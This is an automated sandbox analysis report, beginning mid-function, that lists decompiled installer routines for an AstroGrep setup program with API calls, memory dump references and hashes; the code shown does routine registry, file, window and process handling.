				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                                                            0x004015b3
                                                                                                            0x004015ba
                                                                                                            0x004015bd
                                                                                                            0x004015c2
                                                                                                            0x004015c6
                                                                                                            0x004015c8
                                                                                                            0x004015d0
                                                                                                            0x004015d2
                                                                                                            0x004015d4
                                                                                                            0x004015d8
                                                                                                            0x004015db
                                                                                                            0x004015f3
                                                                                                            0x004015f4
                                                                                                            0x004015dd
                                                                                                            0x004015dd
                                                                                                            0x004015e0
                                                                                                            0x00000000
                                                                                                            0x004015eb
                                                                                                            0x004015ec
                                                                                                            0x004015ec
                                                                                                            0x004015e0
                                                                                                            0x004015fb
                                                                                                            0x00401602
                                                                                                            0x0040160f
                                                                                                            0x0040160f
                                                                                                            0x00401604
                                                                                                            0x00401605
                                                                                                            0x0040160d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040160d
                                                                                                            0x00401602
                                                                                                            0x00401612
                                                                                                            0x00401615
                                                                                                            0x00401617
                                                                                                            0x00401618
                                                                                                            0x004015c8
                                                                                                            0x0040161f
                                                                                                            0x0040164a
                                                                                                            0x004021c4
                                                                                                            0x00401621
                                                                                                            0x00401623
                                                                                                            0x0040162e
                                                                                                            0x00401634
                                                                                                            0x0040163c
                                                                                                            0x00401642
                                                                                                            0x00401642
                                                                                                            0x0040163c
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(?,?,C:\,?,004058A6,C:\,C:\,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                              • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Program Files (x86)\AstroGrep,00000000,00000000,000000F0), ref: 00401634
                                                                                                            Strings
                                                                                                            • C:\Program Files (x86)\AstroGrep, xrefs: 00401629
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                            • String ID: C:\Program Files (x86)\AstroGrep
                                                                                                            • API String ID: 1892508949-2344716657
                                                                                                            • Opcode ID: deac6dc071e9533c58350b4708d0caef2e548cc73378f66c521ca59dd2e6ec16
                                                                                                            • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                                                                            • Opcode Fuzzy Hash: deac6dc071e9533c58350b4708d0caef2e548cc73378f66c521ca59dd2e6ec16
                                                                                                            • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00404EBC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E00404EBC(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t9;
				int _t11;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					__eflags = _t15 - 0x200;
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						__eflags = _t15 - 0x419;
						if(_t15 == 0x419) {
							__eflags =  *0x429854 - _t16; // 0xffffffff
							if(__eflags != 0) {
								_push(_t16);
								_push(6);
								 *0x429854 = _t16;
								E00404893();
							}
						}
						L11:
						_t9 = CallWindowProcA( *0x42985c, _a4, _t15, _a12, _t16); // executed
						return _t9;
					}
					_t11 = IsWindowVisible(_a4);
					__eflags = _t11;
					if(_t11 == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404813(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 == 0x20) {
					E00403F60(0x413);
					return 0;
				}
				goto L10;
			}







                                                                                                            0x00404ec0
                                                                                                            0x00404eca
                                                                                                            0x00404ee0
                                                                                                            0x00404ee6
                                                                                                            0x00404f08
                                                                                                            0x00404f0b
                                                                                                            0x00404f0b
                                                                                                            0x00404f11
                                                                                                            0x00404f13
                                                                                                            0x00404f19
                                                                                                            0x00404f1b
                                                                                                            0x00404f1c
                                                                                                            0x00404f1e
                                                                                                            0x00404f24
                                                                                                            0x00404f24
                                                                                                            0x00404f19
                                                                                                            0x00404f2e
                                                                                                            0x00404f3c
                                                                                                            0x00000000
                                                                                                            0x00404f3c
                                                                                                            0x00404eeb
                                                                                                            0x00404ef1
                                                                                                            0x00404ef3
                                                                                                            0x00404f2b
                                                                                                            0x00404f2b
                                                                                                            0x00000000
                                                                                                            0x00404f2b
                                                                                                            0x00404eff
                                                                                                            0x00404f01
                                                                                                            0x00000000
                                                                                                            0x00404f01
                                                                                                            0x00404ed0
                                                                                                            0x00404ed7
                                                                                                            0x00000000
                                                                                                            0x00404edc
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                                                            • CallWindowProcA.USER32 ref: 00404F3C
                                                                                                              • Part of subcall function 00403F60: SendMessageA.USER32(0008003A,00000000,00000000,00000000), ref: 00403F72
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                                            • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                                                                            • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                                            • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040361A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0040361A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42882c; // 0x0
				_t3 = E004035FF(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8)); // executed
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42882c =  *0x42882c & 0x00000000;
				return _t3;
			}







                                                                                                            0x0040361b
                                                                                                            0x00403623
                                                                                                            0x0040362a
                                                                                                            0x0040362d
                                                                                                            0x0040362d
                                                                                                            0x0040362f
                                                                                                            0x00403634
                                                                                                            0x0040363b
                                                                                                            0x00403641
                                                                                                            0x00403645
                                                                                                            0x00403646
                                                                                                            0x0040364e

                                                                                                            APIs
                                                                                                            • FreeLibrary.KERNELBASE(?,74B5FA90,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                                                                            • GlobalFree.KERNEL32 ref: 0040363B
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 1100898210-3916508600
                                                                                                            • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                                            • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                                                                            • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                                                            • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00401E44, Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E00401E44() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A3A(_t24);
				E00404F48(0xffffffeb, _t13);
				_t15 = E004054C0(_t28);
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00406104(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc);
						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
							if( *(_t31 - 0xc) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405C8D(_t26,  *(_t31 - 0xc));
						}
					}
					_push( *(_t31 + 8));
					FindCloseChangeNotification(); // executed
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                                                                                            0x00401e4a
                                                                                                            0x00401e4f
                                                                                                            0x00401e55
                                                                                                            0x00401e5c
                                                                                                            0x00401e5f
                                                                                                            0x004026a6
                                                                                                            0x00401e65
                                                                                                            0x00401e68
                                                                                                            0x00401e79
                                                                                                            0x00401e74
                                                                                                            0x00401e74
                                                                                                            0x00401e8e
                                                                                                            0x00401e97
                                                                                                            0x00401ea7
                                                                                                            0x00401ea9
                                                                                                            0x00401ea9
                                                                                                            0x00401e99
                                                                                                            0x00401e9d
                                                                                                            0x00401e9d
                                                                                                            0x00401e97
                                                                                                            0x00401eb0
                                                                                                            0x00401eb3
                                                                                                            0x00401eb3
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00402FFA,00402FFA,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,0075D8B4,74B5EA30), ref: 00404FA4
                                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\), ref: 00404FB6
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                              • Part of subcall function 004054C0: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                              • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                                            • GetExitCodeProcess.KERNEL32 ref: 00401E8E
                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CloseProcesslstrlen$ChangeCodeCreateExitFindHandleNotificationObjectSingleTextWaitWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 3954718778-0
                                                                                                            • Opcode ID: 9c1497ac9ac28403df1c5f74c43ba786549f7215323286037fa4732e26fd21e7
                                                                                                            • Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
                                                                                                            • Opcode Fuzzy Hash: 9c1497ac9ac28403df1c5f74c43ba786549f7215323286037fa4732e26fd21e7
                                                                                                            • Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405C16, Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 90%
                                                                                                            			E00405C16(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
				long _t20;
				long _t23;
				long _t24;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x400;
					_t23 = RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x3ff] = 0;
					_t24 = RegCloseKey(_a20); // executed
					return _t24;
				}
				return _t20;
			}







                                                                                                            0x00405c26
                                                                                                            0x00405c28
                                                                                                            0x00405c35
                                                                                                            0x00405c3f
                                                                                                            0x00405c47
                                                                                                            0x00405c4c
                                                                                                            0x00405c60
                                                                                                            0x00405c68
                                                                                                            0x00405c76
                                                                                                            0x00405c76
                                                                                                            0x00405c7b
                                                                                                            0x00405c81
                                                                                                            0x00000000
                                                                                                            0x00405c81
                                                                                                            0x00405c8a

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,00405E5B,00000000,00000002,?,00000002,?,?,00405E5B,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 00405C3F
                                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00405E5B,?,00405E5B), ref: 00405C60
                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00405C81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                                            • Instruction ID: 20ca943cec1bfd02e9a7b8a7961d2af95be0026f17772609ad776ff58b8bf793
                                                                                                            • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                                            • Instruction Fuzzy Hash: 1601487254420EEFEB128F64EC48EEB3FACEF15394B004126FA04A6220D235D964CBA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402482, Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E00402482(int* __ebx, char* __esi) {
				int _t8;
				long _t11;
				int* _t14;
				void* _t18;
				char* _t20;
				void* _t22;
				void* _t25;

				_t20 = __esi;
				_t14 = __ebx;
				_t18 = E00402B44(_t25, 0x20019);
				_t8 = E00402A1D(3);
				 *__esi = __ebx;
				if(_t18 == __ebx) {
					L7:
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					 *(_t22 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t22 - 0x18)) == __ebx) {
						_t11 = RegEnumValueA(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t11;
						if(_t11 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyA(_t18, _t8, __esi, 0x3ff);
						L4:
						_t20[0x3ff] = _t14;
						_push(_t18); // executed
						RegCloseKey(); // executed
					}
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}










                                                                                                            0x00402482
                                                                                                            0x00402482
                                                                                                            0x0040248e
                                                                                                            0x00402490
                                                                                                            0x00402497
                                                                                                            0x00402499
                                                                                                            0x004026a6
                                                                                                            0x004026a6
                                                                                                            0x0040249f
                                                                                                            0x004024a7
                                                                                                            0x004024aa
                                                                                                            0x004024c3
                                                                                                            0x004024c9
                                                                                                            0x004024cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004024ac
                                                                                                            0x004024b0
                                                                                                            0x004024d1
                                                                                                            0x004024d1
                                                                                                            0x004024d7
                                                                                                            0x004024d8
                                                                                                            0x004024d8
                                                                                                            0x004024aa
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                            • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                                                            • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Enum$CloseOpenValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 167947723-0
                                                                                                            • Opcode ID: 06371cf6d5cd5c24906f8395af35970081992d6fcbf92cd5232b19a67d9e6aaa
                                                                                                            • Instruction ID: 651eecc7003a3be3ddeb342969b55079318d5f4ee149c111f32be82b22242bac
                                                                                                            • Opcode Fuzzy Hash: 06371cf6d5cd5c24906f8395af35970081992d6fcbf92cd5232b19a67d9e6aaa
                                                                                                            • Instruction Fuzzy Hash: 6FF0AD72A04200AFEB11AF659E88EBB7A6DEB40344B10443AF505A61C0D6B849459A7A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405589, Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 41%
                                                                                                            			E00405589(void* __eflags, CHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				CHAR* _t14;

				_t14 = _a4;
				_t13 = E0040597D(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileA(); // executed
				} else {
					_t9 = RemoveDirectoryA(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesA(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                                                                                                            0x0040558a
                                                                                                            0x00405595
                                                                                                            0x0040559a
                                                                                                            0x004055ca
                                                                                                            0x00000000
                                                                                                            0x004055ca
                                                                                                            0x004055a1
                                                                                                            0x004055a2
                                                                                                            0x004055ac
                                                                                                            0x004055a4
                                                                                                            0x004055a4
                                                                                                            0x004055a4
                                                                                                            0x004055b4
                                                                                                            0x004055c0
                                                                                                            0x004055c4
                                                                                                            0x004055c4
                                                                                                            0x00000000
                                                                                                            0x004055b6
                                                                                                            0x00000000
                                                                                                            0x004055b8

                                                                                                            APIs
                                                                                                              • Part of subcall function 0040597D: GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                                                                              • Part of subcall function 0040597D: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405996
                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,00405778), ref: 004055A4
                                                                                                            • DeleteFileA.KERNELBASE(?,?,?,00000000,00405778), ref: 004055AC
                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055C4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                            • String ID:
                                                                                                            • API String ID: 1655745494-0
                                                                                                            • Opcode ID: 17f562840c1773a82e66d36c699c3ba4858698b3520e1b3e97930180dfe60130
                                                                                                            • Instruction ID: ea226f21057ae85524c233b0e105864c274fd993d0d76b55d7ba08098a11cf89
                                                                                                            • Opcode Fuzzy Hash: 17f562840c1773a82e66d36c699c3ba4858698b3520e1b3e97930180dfe60130
                                                                                                            • Instruction Fuzzy Hash: DDE0E53152AB51AAD21057308C0CB5F2EEAEF86324F040A3AF552F21D4C37888468ABE
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403EED, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00403EED(int _a4) {
				long _t3;

				if(_a4 == 0x78) {
					 *0x42dbcc =  *0x42dbcc + 1;
				}
				_t3 = SendMessageA( *0x42e408, 0x408, _a4, 0); // executed
				return _t3;
			}




                                                                                                            0x00403ef2
                                                                                                            0x00403ef4
                                                                                                            0x00403ef4
                                                                                                            0x00403f0b
                                                                                                            0x00403f11

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(00000408,?,00000000,00403B4F), ref: 00403F0B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: x
                                                                                                            • API String ID: 3850602802-2363233923
                                                                                                            • Opcode ID: 7a9f1fa3dd0be59651df54e26dfd36179d296c2ea1a6027e512c3cc900362168
                                                                                                            • Instruction ID: 0defc1578c0d95c91bb2a5b33422b57c17ce645d8d356cb5eaab9656918cdef7
                                                                                                            • Opcode Fuzzy Hash: 7a9f1fa3dd0be59651df54e26dfd36179d296c2ea1a6027e512c3cc900362168
                                                                                                            • Instruction Fuzzy Hash: BBC01231A44200AEEB215B00DE09F067A20FB64B03F208039F345290B5C2702422EB2D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402410, Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E00402410(int* __ebx, char* __esi) {
				void* _t17;
				char* _t18;
				long _t21;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402B44(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402A3A(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x34) = 0x400;
					_t21 = RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x34); // executed
					if(_t21 != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00405C8D(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x3ff] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x42e488 =  *0x42e488 +  *(_t37 - 4);
				return 0;
			}









                                                                                                            0x00402410
                                                                                                            0x00402410
                                                                                                            0x00402415
                                                                                                            0x0040241c
